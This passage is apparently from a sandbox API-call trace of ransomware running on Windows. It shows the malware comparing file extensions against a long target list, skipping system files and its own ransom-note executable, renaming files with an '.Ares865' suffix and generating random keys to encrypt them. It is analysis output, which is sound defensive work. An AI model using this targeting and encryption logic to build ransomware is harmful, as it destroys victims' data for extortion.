(lpString="vmdk") returned 4 [0084.757] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.757] lstrlenW (lpString="rar") returned 3 [0084.757] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.758] lstrlenW (lpString="zip") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.758] lstrlenW (lpString="tgz") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.758] lstrlenW (lpString="vbox") returned 4 [0084.758] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.758] lstrlenW (lpString="vdi") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.758] lstrlenW (lpString="vhd") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.758] lstrlenW (lpString="vhdx") returned 4 [0084.758] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.758] lstrlenW (lpString="avhd") returned 4 [0084.758] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.758] lstrlenW (lpString="db") returned 2 [0084.758] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.758] lstrlenW (lpString="db2") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.758] lstrlenW (lpString="db3") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.758] lstrlenW (lpString="dbf") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.758] lstrlenW (lpString="mdf") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.758] lstrlenW (lpString="mdb") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.758] lstrlenW (lpString="sql") returned 3 [0084.758] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.758] lstrlenW (lpString="sqlite") returned 6 [0084.758] lstrcmpiW (lpString1="16.bmp", lpString2="sqlite") returned -1 [0084.758] lstrlenW (lpString="sqlite3") returned 7 [0084.759] lstrcmpiW (lpString1="e16.bmp", lpString2="sqlite3") returned -1 [0084.759] lstrlenW (lpString="sqlitedb") returned 8 [0084.759] lstrcmpiW (lpString1="le16.bmp", lpString2="sqlitedb") returned -1 [0084.759] lstrlenW (lpString="xml") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.759] lstrlenW (lpString="$er") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.759] lstrlenW (lpString="4dd") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.759] lstrlenW (lpString="4dl") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.759] lstrlenW (lpString="^^^") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.759] lstrlenW (lpString="abs") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.759] lstrlenW (lpString="abx") returned 3 [0084.759] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.759] lstrlenW (lpString="accdb") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accdb") returned -1 [0084.759] lstrlenW (lpString="accdc") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accdc") returned -1 [0084.759] lstrlenW (lpString="accde") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accde") returned -1 [0084.759] lstrlenW (lpString="accdr") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accdr") returned -1 [0084.759] lstrlenW (lpString="accdt") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accdt") returned -1 [0084.759] lstrlenW (lpString="accdw") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accdw") returned -1 [0084.759] lstrlenW (lpString="accft") returned 5 [0084.759] lstrcmpiW (lpString1="6.bmp", lpString2="accft") returned -1 [0084.759] lstrlenW (lpString="adb") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.760] lstrlenW (lpString="adb") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.760] lstrlenW (lpString="ade") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.760] lstrlenW (lpString="adf") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.760] lstrlenW (lpString="adn") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.760] lstrlenW (lpString="adp") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.760] lstrlenW (lpString="alf") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.760] lstrlenW (lpString="ask") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.760] lstrlenW (lpString="btr") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.760] lstrlenW (lpString="cat") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.760] lstrlenW (lpString="cdb") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.760] lstrlenW (lpString="ckp") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.760] lstrlenW (lpString="cma") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.760] lstrlenW (lpString="cpd") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.760] lstrlenW (lpString="dacpac") returned 6 [0084.760] lstrcmpiW (lpString1="16.bmp", lpString2="dacpac") returned -1 [0084.760] lstrlenW (lpString="dad") returned 3 [0084.760] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.760] lstrlenW (lpString="dadiagrams") returned 10 [0084.760] lstrcmpiW (lpString1="tile16.bmp", lpString2="dadiagrams") returned 1 [0084.760] lstrlenW (lpString="daschema") returned 8 [0084.760] lstrcmpiW (lpString1="le16.bmp", lpString2="daschema") returned 1 [0084.760] lstrlenW (lpString="db-journal") returned 10 [0084.760] lstrcmpiW (lpString1="tile16.bmp", lpString2="db-journal") returned 1 [0084.760] lstrlenW (lpString="db-shm") returned 6 [0084.761] lstrcmpiW (lpString1="16.bmp", lpString2="db-shm") returned -1 [0084.761] lstrlenW (lpString="db-wal") returned 6 [0084.761] lstrcmpiW (lpString1="16.bmp", lpString2="db-wal") returned -1 [0084.761] lstrlenW (lpString="dbc") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.761] lstrlenW (lpString="dbs") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.761] lstrlenW (lpString="dbt") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.761] lstrlenW (lpString="dbv") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.761] lstrlenW (lpString="dbx") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.761] lstrlenW (lpString="dcb") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.761] lstrlenW (lpString="dct") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.761] lstrlenW (lpString="dcx") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.761] lstrlenW (lpString="ddl") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.761] lstrlenW (lpString="dlis") returned 4 [0084.761] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.761] lstrlenW (lpString="dp1") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.761] lstrlenW (lpString="dqy") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.761] lstrlenW (lpString="dsk") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.761] lstrlenW (lpString="dsn") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.761] lstrlenW (lpString="dtsx") returned 4 [0084.761] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.761] lstrlenW (lpString="dxl") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.761] lstrlenW (lpString="eco") returned 3 [0084.761] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.761] lstrlenW (lpString="ecx") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.762] lstrlenW (lpString="edb") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.762] lstrlenW (lpString="epim") returned 4 [0084.762] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.762] lstrlenW (lpString="fcd") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.762] lstrlenW (lpString="fdb") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.762] lstrlenW (lpString="fic") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.762] lstrlenW (lpString="flexolibrary") returned 12 [0084.762] lstrcmpiW (lpString1="ertile16.bmp", lpString2="flexolibrary") returned -1 [0084.762] lstrlenW (lpString="fm5") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.762] lstrlenW (lpString="fmp") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.762] lstrlenW (lpString="fmp12") returned 5 [0084.762] lstrcmpiW (lpString1="6.bmp", lpString2="fmp12") returned -1 [0084.762] lstrlenW (lpString="fmpsl") returned 5 [0084.762] lstrcmpiW (lpString1="6.bmp", lpString2="fmpsl") returned -1 [0084.762] lstrlenW (lpString="fol") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.762] lstrlenW (lpString="fp3") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.762] lstrlenW (lpString="fp4") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.762] lstrlenW (lpString="fp5") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.762] lstrlenW (lpString="fp7") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.762] lstrlenW (lpString="fpt") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.762] lstrlenW (lpString="frm") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.762] lstrlenW (lpString="gdb") returned 3 [0084.762] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.762] lstrlenW (lpString="gdb") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.763] lstrlenW (lpString="grdb") returned 4 [0084.763] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.763] lstrlenW (lpString="gwi") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.763] lstrlenW (lpString="hdb") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.763] lstrlenW (lpString="his") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.763] lstrlenW (lpString="ib") returned 2 [0084.763] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.763] lstrlenW (lpString="idb") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.763] lstrlenW (lpString="ihx") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.763] lstrlenW (lpString="itdb") returned 4 [0084.763] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.763] lstrlenW (lpString="itw") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.763] lstrlenW (lpString="jet") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.763] lstrlenW (lpString="jtx") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.763] lstrlenW (lpString="kdb") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.763] lstrlenW (lpString="kexi") returned 4 [0084.763] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.763] lstrlenW (lpString="kexic") returned 5 [0084.763] lstrcmpiW (lpString1="6.bmp", lpString2="kexic") returned -1 [0084.763] lstrlenW (lpString="kexis") returned 5 [0084.763] lstrcmpiW (lpString1="6.bmp", lpString2="kexis") returned -1 [0084.763] lstrlenW (lpString="lgc") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.763] lstrlenW (lpString="lwx") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.763] lstrlenW (lpString="maf") returned 3 [0084.763] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.763] lstrlenW (lpString="maq") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.764] lstrlenW (lpString="mar") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.764] lstrlenW (lpString="marshal") returned 7 [0084.764] lstrcmpiW (lpString1="e16.bmp", lpString2="marshal") returned -1 [0084.764] lstrlenW (lpString="mas") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.764] lstrlenW (lpString="mav") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.764] lstrlenW (lpString="maw") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.764] lstrlenW (lpString="mdbhtml") returned 7 [0084.764] lstrcmpiW (lpString1="e16.bmp", lpString2="mdbhtml") returned -1 [0084.764] lstrlenW (lpString="mdn") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.764] lstrlenW (lpString="mdt") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.764] lstrlenW (lpString="mfd") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.764] lstrlenW (lpString="mpd") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.764] lstrlenW (lpString="mrg") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.764] lstrlenW (lpString="mud") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.764] lstrlenW (lpString="mwb") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.764] lstrlenW (lpString="myd") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.764] lstrlenW (lpString="ndf") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.764] lstrlenW (lpString="nnt") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.764] lstrlenW (lpString="nrmlib") returned 6 [0084.764] lstrcmpiW (lpString1="16.bmp", lpString2="nrmlib") returned -1 [0084.764] lstrlenW (lpString="ns2") returned 3 [0084.764] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.764] lstrlenW (lpString="ns3") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.765] lstrlenW (lpString="ns4") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.765] lstrlenW (lpString="nsf") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.765] lstrlenW (lpString="nv") returned 2 [0084.765] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.765] lstrlenW (lpString="nv2") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.765] lstrlenW (lpString="nwdb") returned 4 [0084.765] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.765] lstrlenW (lpString="nyf") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.765] lstrlenW (lpString="odb") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.765] lstrlenW (lpString="odb") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.765] lstrlenW (lpString="oqy") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.765] lstrlenW (lpString="ora") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.765] lstrlenW (lpString="orx") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.765] lstrlenW (lpString="owc") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.765] lstrlenW (lpString="p96") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.765] lstrlenW (lpString="p97") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.765] lstrlenW (lpString="pan") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.765] lstrlenW (lpString="pdb") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.765] lstrlenW (lpString="pdm") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.765] lstrlenW (lpString="pnz") returned 3 [0084.765] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.765] lstrlenW (lpString="qry") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.766] lstrlenW (lpString="qvd") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.766] lstrlenW (lpString="rbf") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.766] lstrlenW (lpString="rctd") returned 4 [0084.766] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.766] lstrlenW (lpString="rod") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.766] lstrlenW (lpString="rodx") returned 4 [0084.766] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.766] lstrlenW (lpString="rpd") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.766] lstrlenW (lpString="rsd") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.766] lstrlenW (lpString="sas7bdat") returned 8 [0084.766] lstrcmpiW (lpString1="le16.bmp", lpString2="sas7bdat") returned -1 [0084.766] lstrlenW (lpString="sbf") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.766] lstrlenW (lpString="scx") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.766] lstrlenW (lpString="sdb") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.766] lstrlenW (lpString="sdc") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.766] lstrlenW (lpString="sdf") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.766] lstrlenW (lpString="sis") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.766] lstrlenW (lpString="spq") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.766] lstrlenW (lpString="te") returned 2 [0084.766] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.766] lstrlenW (lpString="teacher") returned 7 [0084.766] lstrcmpiW (lpString1="e16.bmp", lpString2="teacher") returned -1 [0084.766] lstrlenW (lpString="tmd") returned 3 [0084.766] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.766] lstrlenW (lpString="tps") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.767] lstrlenW (lpString="trc") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.767] lstrlenW (lpString="trc") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.767] lstrlenW (lpString="trm") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.767] lstrlenW (lpString="udb") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.767] lstrlenW (lpString="udl") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.767] lstrlenW (lpString="usr") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.767] lstrlenW (lpString="v12") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.767] lstrlenW (lpString="vis") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.767] lstrlenW (lpString="vpd") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.767] lstrlenW (lpString="vvv") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.767] lstrlenW (lpString="wdb") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.767] lstrlenW (lpString="wmdb") returned 4 [0084.767] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.767] lstrlenW (lpString="wrk") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.767] lstrlenW (lpString="xdb") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.767] lstrlenW (lpString="xld") returned 3 [0084.767] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.767] lstrlenW (lpString="xmlff") returned 5 [0084.767] lstrcmpiW (lpString1="6.bmp", lpString2="xmlff") returned -1 [0084.767] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.Ares865") returned 90 [0084.767] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.ares865"), dwFlags=0x1) returned 1 [0084.768] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.768] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.769] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.770] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.770] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.770] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.771] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.775] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.775] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.775] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.776] CloseHandle (hObject=0x15c) returned 1 [0084.776] CloseHandle (hObject=0x118) returned 1 [0084.776] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.776] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.776] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.776] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc3f8f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="aoldtz.exe") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2=".") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="..") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="windows") returned -1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="bootmgr") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="temp") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="pagefile.sys") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="boot") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="ids.txt") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="ntuser.dat") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="perflogs") returned 1 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2="MSBuild") returned 1 [0084.777] lstrlenW (lpString="usertile17.bmp") returned 14 